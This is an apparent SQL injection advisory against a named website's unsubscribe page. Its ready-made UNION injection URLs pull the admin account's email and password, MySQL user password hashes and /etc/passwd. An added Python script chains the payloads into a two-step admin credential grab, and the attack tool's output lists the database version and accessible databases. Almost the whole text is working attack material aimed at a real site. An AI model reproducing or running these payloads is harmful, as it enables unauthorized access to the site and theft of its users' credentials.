PoC : http://www.faniq.com/unsubscribe.php?invite_id=[SQLi]
Demo: http://www.faniq.com/unsubscribe.php?invite_id=64954193+AND+1=2+UNION+SELECT+concat_ws(0x3a,user(),database(),version())--
Tools: schemafuzz.py v5.0
Admin page: http://www.faniq.com/admin/
Admin user/password queries:
- step 1 (get the member_id that has admin privilege): http://www.faniq.com/unsubscribe.php?invite_id=64954193+AND+1=2+UNION+SELECT+concat_ws(0x3a,member_id,admin)+from+member_privs+where+admin=char(0x59)--
- step 2 (get email & password for the member_id found in step 1): http://www.faniq.com/unsubscribe.php?invite_id=64954193+AND+1=2+UNION+SELECT+concat_ws(0x3a,member_id,email,password)+from+member+where+member_id=char(0x3134)--
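The two steps above, plus the demo and load_file payloads, all follow one pattern: keep the valid invite_id, kill its row with AND 1=2, UNION in a single column built with concat_ws(0x3a,...), and avoid quotes by writing strings as hex or char() literals. The following is an added example, not code from the advisory or from schemafuzz.py: it rebuilds those exact payloads from helper functions and parses the colon-joined results. Everything taken from the page is the URL, the invite_id 64954193 and the table/column names; the helper names and the sample responses are assumptions, the responses constructed rather than captured, and locating the echoed string inside the page's HTML is left out because it is specific to that page.

```python
# Added example, not code from the original advisory or from schemafuzz.py:
# builds the UNION-based invite_id payloads shown above and parses the
# colon-joined concat_ws() results. Only the URL, the invite_id value and the
# table/column names come from the advisory; the sample responses at the
# bottom are constructed, not captured.

BASE_URL = "http://www.faniq.com/unsubscribe.php?invite_id="
INVITE_ID = 64954193          # valid id from the advisory; AND 1=2 empties its row
SEPARATOR = 0x3A              # ':' passed to concat_ws as a hex literal


def hex_literal(text):
    """Encode text as a MySQL hex literal (0x2f65...) so no quotes are needed."""
    return "0x" + text.encode("utf-8").hex()


def char_literal(text):
    """Encode text as char(0x..): MySQL splits an integer above 255 into its
    bytes, so char(0x3134) is '14' and char(0x59) is 'Y', as in the advisory."""
    return "char(" + hex_literal(text) + ")"


def decode_hex_literal(literal):
    """Inverse of hex_literal, for reading payloads such as load_file(0x2f...)."""
    if not literal.lower().startswith("0x"):
        raise ValueError("not a MySQL hex literal: %r" % literal)
    return bytes.fromhex(literal[2:]).decode("utf-8")


def concat_columns(columns):
    """concat_ws(0x3a, c1, c2, ...) packs several columns into the single
    column the original SELECT exposes."""
    return "concat_ws(%s,%s)" % (hex(SEPARATOR), ",".join(columns))


def build_payload(select_expr, table=None, where=None):
    """Injected value: the real id, a false predicate so the legitimate row
    drops out, a one-column UNION, then a -- comment to swallow the rest."""
    sql = "%d AND 1=2 UNION SELECT %s" % (INVITE_ID, select_expr)
    if table:
        sql += " from " + table
    if where:
        sql += " where " + where
    return sql + "--"


def to_url(payload):
    """Use '+' for spaces, the evasion the advisory's tool log reports."""
    return BASE_URL + payload.replace(" ", "+")


def parse_row(text, fields):
    """Split a concat_ws result back into named fields. Only the first
    len(fields)-1 separators count, so a trailing field that itself contains
    ':' (a password hash, for instance) is kept intact."""
    parts = text.split(chr(SEPARATOR), len(fields) - 1)
    if len(parts) != len(fields):
        raise ValueError("expected %d fields, got %r" % (len(fields), text))
    return dict(zip(fields, parts))


# Step 1 and step 2 of the advisory, rebuilt from the helpers above.
STEP1_FIELDS = ["member_id", "admin"]
STEP2_FIELDS = ["member_id", "email", "password"]
STEP1_URL = to_url(build_payload(concat_columns(STEP1_FIELDS),
                                 "member_privs", "admin=" + char_literal("Y")))


def step2_url_for(step1_response):
    """Feed the member_id recovered in step 1 into the step 2 query."""
    member_id = parse_row(step1_response, STEP1_FIELDS)["member_id"]
    return to_url(build_payload(concat_columns(STEP2_FIELDS), "member",
                                "member_id=" + char_literal(member_id)))


if __name__ == "__main__":
    # Constructed sample responses standing in for the text the page echoes.
    sample_step1 = "14:Y"
    sample_step2 = "14:admin@example.invalid:5f4dcc3b5aa765d61d8327deb882cf99"
    print(STEP1_URL)
    print(step2_url_for(sample_step1))
    print(parse_row(sample_step2, STEP2_FIELDS))
    print(decode_hex_literal("0x2f6574632f706173737764"))  # path load_file reads
```

parse_row splits on at most len(fields)-1 colons on purpose: concat_ws gives no way to escape the separator, so an email or hash containing ':' would otherwise shift every field after it.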
Screenshot of admin page:
Database info:
[+] URL:http://www.faniq.com/unsubscribe.php?invite_id=64954193+AND+1=2+UNION+SELECT+sqli--
[+] Evasion Used: "+" "--"
[+] 17:40:49
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: FANIQ
User: sport@10.10.11.135
Version: 5.0.45-log
[+] Do we have Access to MySQL Database: Yes <-- w00t w00t
[!] http://www.faniq.com/unsubscribe.php?invite_id=64954193+AND+1=2+UNION+SELECT+concat(user,0x3a,password)+FROM+mysql.user--
[+] Do we have Access to Load_File: Yes <-- w00t w00t
[!] http://www.faniq.com/unsubscribe.php?invite_id=64954193+AND+1=2+UNION+SELECT+load_file(0x2f6574632f706173737764)--
[-] [17:40:58]
[-] Total URL Requests 3
[-] Done
[+] URL:http://www.faniq.com/unsubscribe.php?invite_id=64954193+AND+1=2+UNION+SELECT+sqli--
[+] Evasion Used: "+" "--"
[+] 17:41:14
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: FANIQ
User: sport@10.10.11.135
Version: 5.0.45-log
[+] Showing all databases current user has access too!
[+] Number of Databases: 4
[0]FANIQ
[1]STATS
[2]mysql
[3]test
[-] [17:41:26]
[-] Total URL Requests 6
[-] Done